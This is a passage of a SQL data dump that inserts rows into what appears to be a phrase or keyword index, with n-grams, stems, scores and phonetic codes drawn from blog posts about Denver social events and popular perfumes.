mean',0,1,1.2667,'T500',1,'en'),(20538,'the mean time','the mean time',0,1,1.4333,'T535',1,'en'),(20539,'the meat','the meat',0,1,1.2667,'T530',1,'en'),(20540,'the meat market','the meat market',0,1,1.5,'T535623',1,'en'),(20541,'the olympic','the olympic',0,1,1.3667,'T4512',1,'en'),(20542,'the olympic games','the olympic games',0,1,1.5667,'T451252',1,'en'),(20543,'the play','the play',0,1,1.2667,'T140',1,'en'),(20544,'the play went','the play went',0,1,1.4333,'T1453',1,'en'),(20545,'the puppy\'s','the puppy',0,1,1.3667,'T120',1,'en'),(20546,'the puppy\'s gallery','the puppy gallery',0,1,1.6333,'T1246',1,'en'),(20547,'the railbenders','the railbenders',0,1,1.5,'T6415362',1,'en'),(20548,'the railbenders and','the railbenders and',0,1,1.6333,'T641536253',1,'en'),(20549,'the recent','the recent',0,1,1.3333,'T6253',1,'en'),(20550,'the recent l','the recent l',0,1,1.4,'T62534',1,'en'),(20551,'the red','the red',0,1,1.2333,'T630',1,'en'),(20552,'the red nose','the red nose',0,1,1.4,'T6352',1,'en'),(20553,'the several','the several',0,1,1.3667,'T2164',1,'en'),(20554,'the several denverites','the several denverites',0,1,1.7333,'T2164351632',1,'en'),(20555,'the tasting','the tasting',0,1,1.3667,'T2352',1,'en'),(20556,'the tasting will','the tasting will',0,1,1.5333,'T23524',1,'en'),(20557,'the tony','the tony',0,1,1.2667,'T500',1,'en'),(20558,'the tony hamptons','the tony hamptons',0,1,1.5667,'T51352',1,'en'),(20559,'the toy','the toy',0,1,1.2333,'T000',1,'en'),(20560,'the toy about','the toy about',0,1,1.4333,'T130',1,'en'),(20561,'the world','the world',0,1,1.3,'T643',4,'en'),(20562,'the world clown','the world clown',0,1,1.5,'T643245',1,'en'),(20563,'the world in','the world in',0,1,1.4,'T6435',1,'en'),(20564,'think i','think i',0,1,1.2333,'T520',1,'en'),(20565,'think i flubbed','think i flubbed',0,1,1.5,'T521413',1,'en'),(20566,'this month','thi month',0,1,1.3333,'T253',1,'en'),(20567,'this month in','thi month in',0,1,1.4333,'T2535',1,'en'),(20568,'this past','thi past',0,1,1.3,'T2123',1,'en'),(20569,'this past weekend','thi past weekend',0,1,1.5667,'T2123253',1,'en'),(20570,'three','three',0,0,0.3333,'T600',5,'en'),(20571,'three medals','three medals',0,1,1.4,'T65342',1,'en'),(20572,'three medals a','three medals a',0,1,1.4667,'T65342',1,'en'),(20573,'three other','three other',0,1,1.3667,'T636',1,'en'),(20574,'three other elite','three other elite',0,1,1.5667,'T63643',1,'en'),(20575,'thursday\'s','thursdai',0,0,0.6667,'T6232',1,'en'),(20576,'thursday\'s eating','thursdai eating',0,1,1.5667,'T6232352',1,'en'),(20577,'thursday\'s eating out','thursdai eating out',0,1,1.7,'T62323523',1,'en'),(20578,'time goose','time goose',0,1,1.3333,'T520',1,'en'),(20579,'time goose sorensen','time goose sorensen',0,1,1.6333,'T526525',1,'en'),(20580,'tip','tip',0,0,0.2,'T100',1,'en'),(20581,'tip off','tip off',0,1,1.2333,'T100',1,'en'),(20582,'tip off sez','tip off sez',0,1,1.3667,'T120',1,'en'),(20583,'to be exquisite','to be exquisite',0,1,1.5,'T123',1,'en'),(20584,'to do','to do',0,1,1.1667,'T000',5,'en'),(20585,'to do a','to do a',0,1,1.2333,'T000',1,'en'),(20586,'to eat','to eat',0,1,1.2,'T000',1,'en'),(20587,'to eat animals','to eat animals',0,1,1.4667,'T542',1,'en'),(20588,'to frederick','to frederick',0,1,1.4,'T16362',1,'en'),(20589,'to frederick s','to frederick s',0,1,1.4667,'T16362',1,'en'),(20590,'to get','to get',0,1,1.2,'T230',4,'en'),(20591,'to get naked','to get naked',0,1,1.4,'T23523',1,'en'),(20592,'to i\'m','to i',0,1,1.2,'T500',1,'en'),(20593,'to i\'m down','to i down',0,1,1.3667,'T535',1,'en'),(20594,'to leave','to leave',0,1,1.2667,'T410',1,'en'),(20595,'to leave and','to leave and',0,1,1.4,'T4153',1,'en'),(20596,'to model','to model',0,1,1.2667,'T534',1,'en'),(20597,'to model his','to model his',0,1,1.4,'T5342',1,'en'),(20598,'to star','to star',0,1,1.2333,'T236',1,'en'),(20599,'to star in','to star in',0,1,1.3333,'T2365',1,'en'),(20600,'to utter','to utter',0,1,1.2667,'T600',1,'en'),(20601,'to utter my','to utter my',0,1,1.3667,'T650',1,'en'),(20602,'to william','to william',0,1,1.3333,'T450',1,'en'),(20603,'to william matthews\'','to william matthews',0,1,1.6667,'T4532',1,'en'),(20604,'tony','toni',0,0,0.2667,'T500',1,'en'),(20605,'tony hamptons','toni hamptons',0,1,1.4333,'T51352',1,'en'),(20606,'tony hamptons magazine','toni hamptons magazine',0,1,1.7333,'T51352525',1,'en'),(20607,'towards','toward',0,0,0.4667,'T632',1,'en'),(20608,'towards barth','toward barth',0,1,1.4333,'T632163',1,'en'),(20609,'towards barth hotel','toward barth hotel',0,1,1.6333,'T6321634',1,'en'),(20610,'toy','toi',0,0,0.2,'T000',1,'en'),(20611,'toy about','toi about',0,1,1.3,'T130',1,'en'),(20612,'toy about a','toi about a',0,1,1.3667,'T130',1,'en'),(20613,'track','track',0,0,0.3333,'T620',2,'en'),(20614,'track residents','track residents',0,1,1.5,'T62623532',1,'en'),(20615,'track residents was','track residents was',0,1,1.6333,'T62623532',1,'en'),(20616,'trademarks','trademark',0,0,0.6667,'T63562',1,'en'),(20617,'trademarks so','trademark so',0,1,1.4333,'T63562',1,'en'),(20618,'trademarks so the','trademark so the',0,1,1.5667,'T635623',1,'en'),(20619,'travel','travel',0,0,0.4,'T614',3,'en'),(20620,'travel to','travel to',0,1,1.3,'T6143',1,'en'),(20621,'travel to be','travel to be',0,1,1.4,'T61431',1,'en'),(20622,'tuned','tune',0,0,0.3333,'T530',1,'en'),(20623,'tuned for','tune for',0,1,1.3,'T5316',1,'en'),(20624,'tuned for more','tune for more',0,1,1.4667,'T531656',1,'en'),(20625,'twice','twice',0,0,0.3333,'T200',3,'en'),(20626,'twice in','twice in',0,1,1.2667,'T250',1,'en'),(20627,'twice in denver','twice in denver',0,1,1.5,'T253516',1,'en'),(20628,'u s','u s',0,1,1.1,'U200',2,'en'),(20629,'u s of','u s of',0,1,1.2,'U210',1,'en'),(20630,'uk http','uk http',0,1,1.2333,'U231',1,'en'),(20631,'uk http www','uk http www',0,1,1.3667,'U231',1,'en'),(20632,'uk outlet','uk outlet',0,1,1.3,'U2343',1,'en'),(20633,'uk outlet dinner','uk outlet dinner',0,1,1.5333,'U234356',1,'en'),(20634,'uk up','uk up',0,1,1.1667,'U210',1,'en'),(20635,'uk up and','uk up and',0,1,1.3,'U2153',1,'en'),(20636,'uniforms','uniform',0,0,0.5333,'U51652',1,'en'),(20637,'uniforms she','uniform she',0,1,1.4,'U51652',1,'en'),(20638,'uniforms she missed','uniform she missed',0,1,1.6333,'U51652523',1,'en'),(20639,'up a','up a',0,1,1.1333,'U100',1,'en'),(20640,'up a blind','up a blind',0,1,1.3333,'U1453',1,'en'),(20641,'up and the','up and the',0,1,1.3333,'U153',1,'en'),(20642,'up four','up four',0,1,1.2333,'U160',1,'en'),(20643,'up four courses','up four courses',0,1,1.5,'U16262',1,'en'),(20644,'up show','up show',0,1,1.2333,'U120',1,'en'),(20645,'up show commercial','up show commercial',0,1,1.6,'U125624',1,'en'),(20646,'using','us',0,0,0.3333,'U252',4,'en'),(20647,'using three','us three',0,1,1.3667,'U25236',1,'en'),(20648,'using three other','us three other',0,1,1.5667,'U2523636',1,'en'),(20649,'utter','utter',0,0,0.3333,'U360',1,'en'),(20650,'utter my','utter my',0,1,1.2667,'U365',1,'en'),(20651,'utter my line','utter my line',0,1,1.4333,'U36545',1,'en'),(20652,'vegan','vegan',0,0,0.3333,'V250',1,'en'),(20653,'vegan in','vegan in',0,1,1.2667,'V250',1,'en'),(20654,'vegan in the','vegan in the',0,1,1.4,'V253',1,'en'),(20655,'very comely','veri comely',0,1,1.3667,'V6254',1,'en'),(20656,'very comely company','veri comely company',0,1,1.6333,'V62542515',1,'en'),(20657,'vista','vista',0,0,0.3333,'V230',1,'en'),(20658,'vista fla','vista fla',0,1,1.3,'V2314',1,'en'),(20659,'vista fla she\'s','vista fla she',0,1,1.5,'V23142',1,'en'),(20660,'walk','walk',0,0,0.2667,'W420',2,'en'),(20661,'walk on','walk on',0,1,1.2333,'W425',1,'en'),(20662,'walk on in','walk on in',0,1,1.3333,'W425',1,'en'),(20663,'walk on role','walk on role',0,1,1.4,'W42564',1,'en'),(20664,'wandered','wander',0,0,0.5333,'W5363',1,'en'),(20665,'wandered in','wander in',0,1,1.3667,'W53635',1,'en'),(20666,'wandered in and','wander in and',0,1,1.5,'W536353',1,'en'),(20667,'was able','wa able',0,1,1.2667,'W214',2,'en'),(20668,'was able to','wa able to',0,1,1.3667,'W2143',2,'en'),(20669,'was chosen','wa chosen',0,1,1.3333,'W250',1,'en'),(20670,'was chosen by','wa chosen by',0,1,1.4333,'W251',1,'en'),(20671,'was displayed','wa displayed',0,1,1.4333,'W232143',1,'en'),(20672,'was displayed in','wa displayed in',0,1,1.5333,'W2321435',1,'en'),(20673,'was great','wa great',0,1,1.3,'W263',1,'en'),(20674,'was great and','wa great and',0,1,1.4333,'W26353',1,'en'),(20675,'was just','wa just',0,1,1.2667,'W230',3,'en'),(20676,'was just named','wa just named',0,1,1.4667,'W2353',1,'en'),(20677,'was one','wa one',0,1,1.2333,'W250',1,'en'),(20678,'was one of','wa one of',0,1,1.3333,'W251',1,'en'),(20679,'watercolors','watercolor',0,0,0.7333,'W362462',1,'en'),(20680,'watercolors u','watercolor u',0,1,1.4333,'W362462',1,'en'),(20681,'watercolors u s','watercolor u s',0,1,1.5,'W362462',1,'en'),(20682,'watering','water',0,0,0.5333,'W3652',1,'en'),(20683,'watering ralph','water ralph',0,1,1.4667,'W3652641',1,'en'),(20684,'watering ralph lauren','water ralph lauren',0,1,1.7,'W3652641465',1,'en'),(20685,'wazee','waze',0,0,0.3333,'W200',1,'en'),(20686,'wazee st','waze st',0,1,1.2667,'W230',1,'en'),(20687,'wazee st noel','waze st noel',0,1,1.4333,'W2354',1,'en'),(20688,'we can','we can',0,1,1.2,'W250',1,'en'),(20689,'we can hot','we can hot',0,1,1.3333,'W253',1,'en'),(20690,'we\'re','we',0,0,0.3333,'W600',1,'en'),(20691,'we\'re not','we not',0,1,1.3,'W653',1,'en'),(20692,'we\'re not clean','we not clean',0,1,1.5,'W653245',1,'en'),(20693,'weekend','weekend',0,0,0.4667,'W253',2,'en'),(20694,'weekend but','weekend but',0,1,1.3667,'W25313',1,'en'),(20695,'weekend but she','weekend but she',0,1,1.5,'W253132',1,'en'),(20696,'well known','well known',0,1,1.3333,'W425',1,'en'),(20697,'well known kentwood','well known kentwood',0,1,1.6333,'W425253',1,'en'),(20698,'went','went',0,0,0.2667,'W530',2,'en'),(20699,'went on','went on',0,1,1.2333,'W535',1,'en'),(20700,'went on it','went on it',0,1,1.3333,'W5353',1,'en'),(20701,'were blindfolded','were blindfolded',0,1,1.5333,'W61453143',1,'en'),(20702,'were blindfolded not','were blindfolded not',0,1,1.6667,'W6145314353',1,'en'),(20703,'where','where',1,0,0.0417,'W600',6,'en'),(20704,'where diners','where diners',0,1,1.4,'W63562',1,'en'),(20705,'where diners were','where diners were',0,1,1.5667,'W635626',1,'en'),(20706,'while the cover','while the cover',0,1,1.5,'W43216',1,'en'),(20707,'who had','who had',0,1,1.2333,'W300',1,'en'),(20708,'who had a','who had a',0,1,1.3,'W300',1,'en'),(20709,'who have','who have',0,1,1.2667,'W100',2,'en'),(20710,'who have for','who have for',0,1,1.4,'W160',1,'en'),(20711,'who says','who says',0,1,1.2667,'W200',1,'en'),(20712,'who says we\'re','who says we',0,1,1.4667,'W260',1,'en'),(20713,'wilcox','wilcox',0,0,0.4,'W420',1,'en'),(20714,'will be blind','will be blind',0,1,1.4333,'W41453',1,'en'),(20715,'will be honored','will be honored',0,1,1.5,'W41563',1,'en'),(20716,'will start','will start',0,1,1.3333,'W42363',1,'en'),(20717,'will start appearing','will start appearing',0,1,1.6667,'W423631652',1,'en'),(20718,'william','william',0,0,0.4667,'W450',1,'en'),(20719,'william matthews\'','william matthews',0,1,1.5667,'W4532',1,'en'),(20720,'william matthews\' new','william matthews new',0,1,1.7,'W45325',1,'en'),(20721,'wine','wine',0,0,0.2667,'W500',1,'en'),(20722,'wine event','wine event',0,1,1.3333,'W5153',1,'en'),(20723,'wine event the','wine event the',0,1,1.4667,'W5153',1,'en'),(20724,'with a','with a',0,1,1.2,'W300',7,'en'),(20725,'with a doorway','with a doorway',0,1,1.4667,'W360',1,'en'),(20726,'with a return','with a return',0,1,1.4333,'W36365',1,'en'),(20727,'with aug.23','with aug.23',0,1,1.3667,'W320',1,'en'),(20728,'with aug.23 ashton','with aug.23 ashton',0,1,1.6,'W3235',1,'en'),(20729,'with ed','with ed',0,1,1.2333,'W300',1,'en'),(20730,'with ed sardella','with ed sardella',0,1,1.5333,'W32634',1,'en'),(20731,'with grapes','with grapes',0,1,1.3667,'W32612',1,'en'),(20732,'with grapes from','with grapes from',0,1,1.5333,'W32612165',1,'en'),(20733,'with holly','with holly',0,1,1.3333,'W340',1,'en'),(20734,'with holly kylberg','with holly kylberg',0,1,1.6,'W3424162',1,'en'),(20735,'with ralph','with ralph',0,1,1.3333,'W3641',2,'en'),(20736,'with ralph lauren','with ralph lauren',0,1,1.5667,'W3641465',2,'en'),(20737,'with three','with three',0,1,1.3333,'W360',1,'en'),(20738,'with three medals','with three medals',0,1,1.5667,'W365342',1,'en'),(20739,'wolfe','wolf',0,0,0.3333,'W410',1,'en'),(20740,'wolfe day','wolf day',0,1,1.3,'W413',1,'en'),(20741,'wolfe day at','wolf day at',0,1,1.4,'W413',1,'en'),(20742,'won','won',0,0,0.2,'W500',1,'en'),(20743,'won clown','won clown',0,1,1.3,'W5245',1,'en'),(20744,'won clown coming','won clown coming',0,1,1.5333,'W5245252',1,'en'),(20745,'working fledermaus','work fledermaus',0,1,1.6,'W6252143652',1,'en'),(20746,'working fledermaus i','work fledermaus i',0,1,1.6667,'W6252143652',1,'en'),(20747,'world','world',0,0,0.3333,'W643',6,'en'),(20748,'world clown','world clown',0,1,1.3667,'W643245',1,'en'),(20749,'world clown connections','world clown connections',0,1,1.7667,'W643245252352',1,'en'),(20750,'world in','world in',0,1,1.2667,'W6435',1,'en'),(20751,'world in the','world in the',0,1,1.4,'W64353',1,'en'),(20752,'yet on','yet on',0,1,1.2,'Y350',1,'en'),(20753,'yet on a','yet on a',0,1,1.2667,'Y350',1,'en'),(20754,'you pair','you pair',0,1,1.2667,'Y160',1,'en'),(20755,'you pair up','you pair up',0,1,1.3667,'Y161',1,'en'),(20756,'1.chanel','1.chanel',0,0,0.5333,'C540',1,'en'),(20757,'1.chanel it','1.chanel it',0,1,1.3667,'C543',1,'en'),(20758,'1.chanel it doesn\'t.5','1.chanel it doesn',0,1,1.7,'C543253',1,'en'),(20759,'10 popular','10 popular',0,1,1.3333,'P460',1,'en'),(20760,'10 popular perfume','10 popular perfume',0,1,1.6,'P461615',1,'en'),(20761,'10 popular perfumes','10 popular perfumes',0,1,1.6333,'P4616152',1,'en'),(20762,'136','136',0,0,0.3,'',1,'en'),(20763,'1948.it','1948.it',0,0,0.4667,'I300',1,'en'),(20764,'1948.it is','1948.it is',0,1,1.3333,'I320',1,'en'),(20765,'1948.it is an','1948.it is an',0,1,1.4333,'I325',1,'en'),(20766,'1993.it','1993.it',0,0,0.4667,'I300',1,'en'),(20767,'1993.it is','1993.it is',0,1,1.3333,'I320',1,'en'),(20768,'1993.it is a','1993.it is a',0,1,1.4,'I320',1,'en'),(20769,'6.ralph','6.ralph',0,0,0.4667,'R410',1,'en'),(20770,'6.ralph lauren','6.ralph lauren',0,1,1.4667,'R41465',1,'en'),(20771,'6.ralph lauren beauty','6.ralph lauren beauty',0,1,1.7,'R4146513',1,'en'),(20772,'7.giorgio','7.giorgio',0,0,0.6,'G620',1,'en'),(20773,'7.giorgio armani','7.giorgio armani',0,1,1.5333,'G6265',1,'en'),(20774,'7.giorgio armani code','7.giorgio armani code',0,1,1.7,'G626523',1,'en'),(20775,'9.l\'air','9.l',0,0,0.4667,'L600',1,'en'),(20776,'9.l\'air du','9.l du',0,1,1.3333,'L630',1,'en'),(20777,'9.l\'air du conditions','9.l du conditions',0,1,1.7,'L6325352',1,'en'),(20778,'a boring','a boring',0,1,1.2667,'A1652',1,'en'),(20779,'a boring designer','a boring designer',0,1,1.5667,'A16523256',1,'en'),(20780,'a bottle','a bottle',0,1,1.2667,'A134',1,'en'),(20781,'a bottle and','a bottle and',0,1,1.4,'A13453',1,'en'),(20782,'a bottle wear','a bottle wear',0,1,1.4333,'A1346',1,'en'),(20783,'a favorite','a favorite',0,1,1.3333,'A163',1,'en'),(20784,'a favorite to','a favorite to',0,1,1.4333,'A163',1,'en'),(20785,'a girly','a girly',0,1,1.2333,'A264',1,'en'),(20786,'a girly figure','a girly figure',0,1,1.4667,'A264126',1,'en'),(20787,'a great pick','a great pick',0,1,1.4,'A26312',1,'en'),(20788,'a list','a list',0,1,1.2,'A423',1,'en'),(20789,'a list of','a list of',0,1,1.3,'A4231',1,'en'),(20790,'a look or','a look or',0,1,1.3,'A426',1,'en'),(20791,'a love','a love',0,1,1.2,'A410',1,'en'),(20792,'a love story','a love story',0,1,1.4,'A41236',1,'en'),(20793,'a perfume','a perfume',0,1,1.3,'A1615',1,'en'),(20794,'a perfume that','a perfume that',0,1,1.4667,'A16153',1,'en'),(20795,'a preferred','a preferred',0,1,1.3667,'A16163',1,'en'),(20796,'a preferred and','a preferred and',0,1,1.5,'A1616353',1,'en'),(20797,'a woman','a woman',0,1,1.2333,'A500',1,'en'),(20798,'a woman floral','a woman floral',0,1,1.4667,'A51464',1,'en'),(20799,'a wonderful','a wonderful',0,1,1.3667,'A53614',1,'en'),(20800,'a wonderful accessory','a wonderful accessory',0,1,1.7,'A5361426',1,'en'),(20801,'a youthful','a youthful',0,1,1.3333,'A314',1,'en'),(20802,'a youthful and','a youthful and',0,1,1.4667,'A31453',1,'en'),(20803,'able to bring','abl to bring',0,1,1.4333,'A1431652',1,'en'),(20804,'absolutely.5','absolutely.5',0,0,0.8,'A12434',1,'en'),(20805,'absolutely.5 is','absolutely.5 is',0,1,1.5,'A124342',1,'en'),(20806,'absolutely.5 is a','absolutely.5 is a',0,1,1.5667,'A124342',1,'en'),(20807,'accessory','accessori',0,0,0.6,'A260',1,'en'),(20808,'accessory women','accessori women',0,1,1.5,'A265',1,'en'),(20809,'accessory women love','accessori women love',0,1,1.6667,'A26541',1,'en'),(20810,'according','accord',0,0,0.6,'A26352',3,'en'),(20811,'according to','accord to',0,1,1.4,'A263523',3,'en'),(20812,'according to many','accord to many',0,1,1.5667,'A2635235',1,'en'),(20813,'acquiring','acquir',0,0,0.6,'A2652',1,'en'),(20814,'acquiring passion','acquir passion',0,1,1.5667,'A2652125',1,'en'),(20815,'acquiring passion and','acquir passion and',0,1,1.7,'A26521253',1,'en'),(20816,'addition','addit',0,0,0.5333,'A350',3,'en'),(20817,'addition sasalwood','addit sasalwood',0,1,1.6,'A35243',1,'en'),(20818,'addition sasalwood this','addit sasalwood this',0,1,1.7667,'A352432',1,'en'),(20819,'again as','again as',0,1,1.2667,'A252',1,'en'),(20820,'again as limited','again as limited',0,1,1.5333,'A252453',1,'en'),(20821,'aldehydes','aldehyd',0,0,0.6,'A432',1,'en'),(20822,'aldehydes lime','aldehyd lime',0,1,1.4667,'A43245',1,'en'),(20823,'aldehydes lime ylang','aldehyd lime ylang',0,1,1.6667,'A43245452',1,'en'),(20824,'all day','all day',0,1,1.2333,'A430',1,'en'),(20825,'all day armani','all day armani',0,1,1.4667,'A4365',1,'en'),(20826,'alshorooq','alshorooq',0,0,0.6,'A4262',1,'en'),(20827,'also the','also the',0,1,1.2667,'A423',2,'en'),(20828,'also the perfect','also the perfect',0,1,1.5333,'A42316123',1,'en'),(20829,'amazing','amaz',0,0,0.4667,'A5252',2,'en'),(20830,'amazing endurance','amaz endurance',0,1,1.5667,'A525253652',1,'en'),(20831,'amazing endurance many','amaz endurance many',0,1,1.7333,'A5252536525',1,'en'),(20832,'amber','amber',0,0,0.3333,'A516',1,'en'),(20833,'amber loans','amber loans',0,1,1.3667,'A516452',1,'en'),(20834,'amber loans ernest','amber loans ernest',0,1,1.6,'A5164526523',1,'en'),(20835,'amber sandalwood','amber sandalwood',0,1,1.5333,'A51625343',1,'en'),(20836,'amber sandalwood genuine','amber sandalwood genuine',0,1,1.8,'A5162534325',1,'en'),(20837,'an iconic','an iconic',0,1,1.3,'A5252',1,'en'),(20838,'an iconic perfume','an iconic perfume',0,1,1.5667,'A52521615',1,'en'),(20839,'an strengthening','an strengthening',0,1,1.5333,'A523652352',1,'en'),(20840,'an strengthening beautiful','an strengthening beautiful',0,1,1.8667,'A5236523521314',1,'en'),(20841,'and amber','and amber',0,1,1.3,'A53516',1,'en'),(20842,'and amber loans','and amber loans',0,1,1.5,'A53516452',1,'en'),(20843,'and box','and box',0,1,1.2333,'A5312',1,'en'),(20844,'and box that','and box that',0,1,1.4,'A53123',1,'en'),(20845,'and chief','and chief',0,1,1.3,'A5321',1,'en'),(20846,'and chief creative','and chief creative',0,1,1.6,'A53212631',1,'en'),(20847,'and classic','and classic',0,1,1.3667,'A53242',1,'en'),(20848,'and classic perfume','and classic perfume',0,1,1.6333,'A532421615',1,'en'),(20849,'and confident','and confident',0,1,1.4333,'A53251353',1,'en'),(20850,'and confident when','and confident when',0,1,1.6,'A532513535',1,'en'),(20851,'and consequently','and consequently',0,1,1.5333,'A53252534',1,'en'),(20852,'and consequently musk','and consequently musk',0,1,1.7,'A5325253452',1,'en'),(20853,'and elegance','and elegance',0,1,1.4,'A534252',1,'en'),(20854,'and elegance l','and elegance l',0,1,1.4667,'A5342524',1,'en'),(20855,'and emerald','and emerald',0,1,1.3667,'A535643',1,'en'),(20856,'and emerald as','and emerald as',0,1,1.4667,'A5356432',1,'en'),(20857,'and feminine','and feminine',0,1,1.4,'A5315',1,'en'),(20858,'and feminine scent','and feminine scent',0,1,1.6,'A5315253',1,'en'),(20859,'and feminine shape','and feminine shape',0,1,1.6,'A531521',1,'en'),(20860,'and fresh','and fresh',0,1,1.3,'A53162',1,'en'),(20861,'and fresh scent','and fresh scent',0,1,1.5,'A5316253',1,'en'),(20862,'and he','and he',0,1,1.2,'A530',4,'en'),(20863,'and he was','and he was',0,1,1.3333,'A532',1,'en'),(20864,'and irresisteble','and irresisteble',0,1,1.5333,'A5362314',1,'en'),(20865,'and irresisteble feel','and irresisteble feel',0,1,1.7,'A536231414',1,'en'),(20866,'and leaves','and leaves',0,1,1.3333,'A53412',1,'en'),(20867,'and leaves jasmine','and leaves jasmine',0,1,1.6,'A534125',1,'en'),(20868,'and leaves musk','and leaves musk',0,1,1.5,'A5341252',1,'en'),(20869,'and love','and love',0,1,1.2667,'A5341',1,'en'),(20870,'and love this','and love this',0,1,1.4333,'A534132',1,'en'),(20871,'and makes','and makes',0,1,1.3,'A5352',1,'en'),(20872,'and makes millions','and makes millions',0,1,1.6,'A53525452',1,'en'),(20873,'and men','and men',0,1,1.2333,'A535',1,'en'),(20874,'and men this','and men this',0,1,1.4,'A53532',1,'en'),(20875,'and not too','and not too',0,1,1.3667,'A5353',1,'en'),(20876,'and perfumer','and perfumer',0,1,1.4,'A5316156',1,'en'),(20877,'and perfumer francis','and perfumer francis',0,1,1.6667,'A53161561652',1,'en'),(20878,'and progressed','and progressed',0,1,1.4667,'A53162623',1,'en'),(20879,'and progressed jean','and progressed jean',0,1,1.6333,'A5316262325',1,'en'),(20880,'and refinement','and refinement',0,1,1.4667,'A536153',1,'en'),(20881,'and refinement from','and refinement from',0,1,1.6333,'A536153165',1,'en'),(20882,'and sells','and sells',0,1,1.3,'A53242',1,'en'),(20883,'and sells it','and sells it',0,1,1.4,'A532423',1,'en'),(20884,'and sexy','and sexy',0,1,1.2667,'A532',1,'en'),(20885,'and sexy scent','and sexy scent',0,1,1.4667,'A53253',1,'en'),(20886,'and spicey','and spicey',0,1,1.3333,'A53212',1,'en'),(20887,'and spicey chypre','and spicey chypre',0,1,1.5667,'A5321216',1,'en'),(20888,'and spicy','and spicy',0,1,1.3,'A53212',1,'en'),(20889,'and spicy perfume','and spicy perfume',0,1,1.5667,'A532121615',1,'en'),(20890,'and suits','and suits',0,1,1.3,'A53232',1,'en'),(20891,'and suits the','and suits the',0,1,1.4333,'A532323',1,'en'),(20892,'and the scent','and the scent',0,1,1.4333,'A53253',1,'en'),(20893,'and timeless','and timeless',0,1,1.4,'A53542',1,'en'),(20894,'and timeless scent','and timeless scent',0,1,1.6,'A5354253',1,'en'),(20895,'and vanilla','and vanilla',0,1,1.3667,'A53154',1,'en'),(20896,'and white','and white',0,1,1.3,'A530',2,'en'),(20897,'and white woods','and white woods',0,1,1.5,'A532',1,'en'),(20898,'and you get','and you get',0,1,1.3667,'A5323',1,'en'),(20899,'any special','ani special',0,1,1.3667,'A52124',1,'en'),(20900,'any special occasion','ani special occasion',0,1,1.6667,'A5212425',1,'en'),(20901,'anywhere','anywher',0,0,0.5333,'A560',2,'en'),(20902,'anywhere for','anywher for',0,1,1.4,'A5616',1,'en'),(20903,'anywhere for any','anywher for any',0,1,1.5333,'A56165',1,'en'),(20904,'area sandalwood','area sandalwood',0,1,1.5,'A625343',1,'en'),(20905,'area sandalwood vetiver','area sandalwood vetiver',0,1,1.7667,'A6253431316',1,'en'),(20906,'armani','armani',0,0,0.4,'A650',2,'en'),(20907,'armani code','armani code',0,1,1.3667,'A6523',2,'en'),(20908,'armani code fill','armani code fill',0,1,1.5333,'A652314',1,'en'),(20909,'armani code pour','armani code pour',0,1,1.5333,'A652316',1,'en'),(20910,'as a great','as a great',0,1,1.3333,'A263',1,'en'),(20911,'as for','as for',0,1,1.2,'A216',1,'en'),(20912,'as for the','as for the',0,1,1.3333,'A2163',1,'en'),(20913,'as limited','as limited',0,1,1.3333,'A2453',1,'en'),(20914,'as limited updates','as limited updates',0,1,1.6,'A2453132',1,'en'),(20915,'attractive','attract',0,0,0.6667,'A36231',1,'en'),(20916,'attractive and','attract and',0,1,1.4667,'A3623153',1,'en'),(20917,'attractive and confident','attract and confident',0,1,1.8,'A3623153251353',1,'en'),(20918,'autonomy','autonomi',0,0,0.5333,'A350',1,'en'),(20919,'autonomy and','autonomi and',0,1,1.4,'A353',1,'en'),(20920,'autonomy and love','autonomi and love',0,1,1.5667,'A35341',1,'en'),(20921,'bean','bean',0,0,0.2667,'B500',1,'en'),(20922,'bean and','bean and',0,1,1.2667,'B530',1,'en'),(20923,'bean and emerald','bean and emerald',0,1,1.5333,'B535643',1,'en'),(20924,'beautiful','beauti',0,0,0.6,'B314',3,'en'),(20925,'beautiful and','beauti and',0,1,1.4333,'B31453',1,'en'),(20926,'beautiful and irresisteble','beauti and irresisteble',0,1,1.8667,'B3145362314',1,'en'),(20927,'beauty','beauti',0,0,0.4,'B300',1,'en'),(20928,'beauty this','beauti this',0,1,1.3667,'B320',1,'en'),(20929,'beauty this enchantment','beauti this enchantment',0,1,1.7667,'B32525353',1,'en'),(20930,'beaux','beaux',0,0,0.3333,'B200',1,'en'),(20931,'beaux was','beaux was',0,1,1.3,'B200',1,'en'),(20932,'beaux was the','beaux was the',0,1,1.4333,'B230',1,'en'),(20933,'been a','been a',0,1,1.2,'B500',2,'en'),(20934,'been a favorite','been a favorite',0,1,1.5,'B5163',1,'en'),(20935,'been worn','been worn',0,1,1.3,'B565',1,'en'),(20936,'been worn by','been worn by',0,1,1.4,'B5651',1,'en'),(20937,'benzoin','benzoin',0,0,0.4667,'B525',1,'en'),(20938,'benzoin forest','benzoin forest',0,1,1.4667,'B5251623',1,'en'),(20939,'benzoin forest vetiver','benzoin forest vetiver',0,1,1.7333,'B52516231316',1,'en'),(20940,'bergamot','bergamot',0,0,0.5333,'B6253',1,'en'),(20941,'bergamot rosewood','bergamot rosewood',0,1,1.5667,'B6253623',1,'en'),(20942,'bergamot rosewood peppermint','bergamot rosewood peppermint',0,1,1.9333,'B62536231653',1,'en'),(20943,'blood','blood',0,0,0.3333,'B430',1,'en'),(20944,'blood orange','blood orange',0,1,1.4,'B43652',1,'en'),(20945,'blood orange ginger','blood orange ginger',0,1,1.6333,'B43652526',1,'en'),(20946,'blood violet','blood violet',0,1,1.4,'B43143',1,'en'),(20947,'blood violet leaving','blood violet leaving',0,1,1.6667,'B431434152',1,'en'),(20948,'bloom','bloom',0,0,0.3333,'B450',1,'en'),(20949,'bloom rose','bloom rose',0,1,1.3333,'B4562',1,'en'),(20950,'bloom rose honey','bloom rose honey',0,1,1.5333,'B45625',1,'en'),(20951,'boring','bore',0,0,0.4,'B652',1,'en'),(20952,'boring designer','bore designer',0,1,1.5,'B6523256',1,'en'),(20953,'boring designer and','bore designer and',0,1,1.6333,'B652325653',1,'en'),(20954,'both elegant','both elegant',0,1,1.4,'B34253',1,'en'),(20955,'both elegant and','both elegant and',0,1,1.5333,'B3425353',1,'en'),(20956,'bottle','bottl',0,0,0.4,'B340',2,'en'),(20957,'bottle and','bottl and',0,1,1.3333,'B3453',1,'en'),(20958,'bottle and box','bottl and box',0,1,1.4667,'B345312',1,'en'),(20959,'bottle design','bottl design',0,1,1.4333,'B34325',1,'en'),(20960,'bottle design was','bottl design was',0,1,1.5667,'B343252',1,'en'),(20961,'bottle for','bottl for',0,1,1.3333,'B3416',1,'en'),(20962,'bottle for this','bottl for this',0,1,1.5,'B341632',1,'en'),(20963,'bottle it','bottl it',0,1,1.3,'B343',1,'en'),(20964,'bottle it mimics','bottl it 